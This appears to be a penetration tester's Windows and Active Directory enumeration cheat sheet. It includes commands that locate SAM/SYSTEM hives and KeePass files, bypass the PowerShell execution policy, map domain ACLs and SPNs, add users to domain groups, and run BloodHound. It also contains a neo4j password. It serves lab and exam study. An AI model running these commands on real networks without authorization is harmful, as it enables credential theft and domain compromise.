Windows

NOTE:

  • Username and hostname

  • Group memberships of the current user

  • Existing users and groups

  • Operating system, version and architecture

  • Network information

  • Installed applications

  • Running processes

Interesting Directory

C:\

# Custom folders
C:\Scripts\
C:\Tools\
C:\Backups\

# To look for SAM, SYSTEM file
C:\Windows\System32\config\

# To look for scheduled tasks
C:\Windows\System32\Tasks\

# To look for program that run on start up
C:\Windows\System32\GroupPolicy\Machine\Scripts\Startup\

# Web Servers folders
C:\xampp\
C:\inetpub\wwwroot\

Interesting Files

Command Prompt

where /r C:\Users *.txt *.pdf *.xls *.xlsx *.doc *.docx *.ini *.log *.ps1 *.kdbx

where /r C:\ *.uac *.dll

where /r C:\ SAM SYSTEM

where /r C:\ local.txt proof.txt

# Display ALL files
dir /a /s

Powershell

Get-ChildItem -Path C:\Users -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx,*ini,*.log,*.ps1,*.kdbx -File -Recurse -ErrorAction SilentlyContinue

Get-ChildItem -Path C:\ -Include *.uac,*.dll -File -Recurse -ErrorAction SilentlyContinue

Get-ChildItem -Path C:\ -Include SAM,SYSTEM -File -Recurse -ErrorAction SilentlyContinue
	
Get-ChildItem -Path C:\ -Include local.txt,proof.txt -File -Recurse -ErrorAction SilentlyContinue

# Display ALL files
ls -Force

User Permissions

User Information

whoami /all

NOTE: The above command consists of the following

whoami /user
whoami /priv
whoami /groups

Page links to different permission attacks (?)

User Enumeration

Get all user in the current machine

net user [/domain]
Get-LocalUser

Get information on a particular user

net user <Username> [/domain]

Get groups on domain

net group [/domain]
Get-LocalGroup

Get users in a particular group

Get-LocalGroupMember "<Group Name>"

Get information on a particular group in the domain

net group <Group Name> /domain

Get local administrators

net localgroup administrators

Get SMB shares

net share

Get password requirements

net accounts

System Enumeration

Get important information

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" /C:"Domain" /C:"Network Card"

Get port information

netstat -ano

Get network information

ipconfig /all

Get current console

(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell

Installed programs

Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

Web Root Directory

dir C:\inetpub\wwwroot
dir C:\xampp\htdocs
dir C:\<Directory Name>\xampp\htdocs

NOTE: Indication of Web Director:

  • .htaccess

  • public.html

  • www

  • htdocs

  • httpdcos

Get History

Get-History
(Get-PSReadlineOption).HistorySavePath

PowerView

NOTE: Remember to run the following

  • powershell -ep bypass

  • Import-Module .\PowerView.ps1

Enumerate Users in the Domain

Get-NetUser

To get filtered result

Get-NetUser | select <Field Name> ...

EXAMPLE:

Get-NetUser | select samaccountname, cn, pwdlastset, lastlogon

To get specific information of a particular user

Get-NetUser <Username>

Enumerate Groups in the Domain

Get-NetGroup

To get filtered result

Get-NetGroup | select <Field name> ...

EXAMPLE:

Get-NetGroup | select cn

To get specific information of a particular group

Get-NetGroup <Group Name>

Enumerate Computers in the Domain

Get-NetComputer

To get filtered result

Get-NetComputer | select <Field name> ...

EXAMPLE:

Get-NetComputer | select operatingsystem, dnshostname

To get specific information of a particular computer

Get-NetComputer <DNS Host Name>

To look for administrative rights on other computer for the current user

Find-LocalAdminAccess

To look for logged on users on target machine

Get-NetSession -ComputerName <Computer Name> -Verbose

NOTE: If something is not right check for permission.

Permissions for NetSessionEnum are defined in SrvsvcSessionInfo registry key (HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity)

Alternatives

C:\Tools\PSTools\PsLoggedon.exe \\<Host Name>

NOTE: Remote machine must have Remote Registry service enabled

To check for permission

Get-Acl -Path <Registery Hive>:<Registry Path> | fl

EXAMPLE:

Get-Acl -Path HKLM:SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity\ | fl

Get-ObjectAcl -SamAccountName <Username> -ResolveGUIDs | fl

To enumerate Service Principal Name

Get-NetUser -SPN | select samaccountname, serviceprincipalname

To enumerate ACEs

Get-ObjectAcl -Identity "<Username | Group Name>"

NOTE: Look out for ActiveDirectoryRights and SecurityIdentifier

To enumerate interesting ACL

Find-InterestingDomainAcl | select identityreferencename,activedirectoryrights,acetype,objectdn | ?{$_.IdentityReferenceName -NotContains "DnsAdmins"} | ft

To enumerate all user that has ActiveDirectoryRights = GenericAll under a group

Get-ObjectAcl -Identity "<Group Name>" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier, ActiveDirectoryRights

To enumerate all ActiveDirectoryRights = GenericWrite under a group

Get-ObjectAcl -Identity "<Group Name>" | ?{$_.ActiveDirectoryRights -eq "GenericWrite"} | select SecurityIdentifier, ActiveDirectoryRights

To convert SID to Name in bulk

"<SID>", "<SID>", "<SID>", "<SID>", "<SID>" | Convert-SidToName

To convert SID to Name individually

Convert-SidToName "<SID>"

Add user into group in domain

net group "<Group Name>" <Username> /add /domain

To enumerate all shares on Domain

Find-DomainShare

To enumerate shares available to current user

Find-DomainShare -CheckShareAccess

To enumerate Group Policy

Get-GPO -Name "<Group Policy Name>"

EXAMPLE:

Get-GPO -Name "Default Domain Policy"

To enumerate permission on the group policy

Get-GPPermission -Guid <Group Unique ID> -TargetType User -TargetName <Username>

NOTE: Only if the permission either contains "ModifySecurity" or "FullControl"

BloodHound

To import BloodHound

Import-Module C:\Tools\Bloodhound.ps1

To begin enumerationg on BloodHound

Invoke-BloodHound -CollectionMethod All -OutputDirectory <Path> -OutputPrefix "corp audit"

On kali:

sudo neo4j start

NOTE: Head over to http://localhost:7474

Username: neo4j

Password: arctic-iris-zipper-prism-courage-7161

Last updated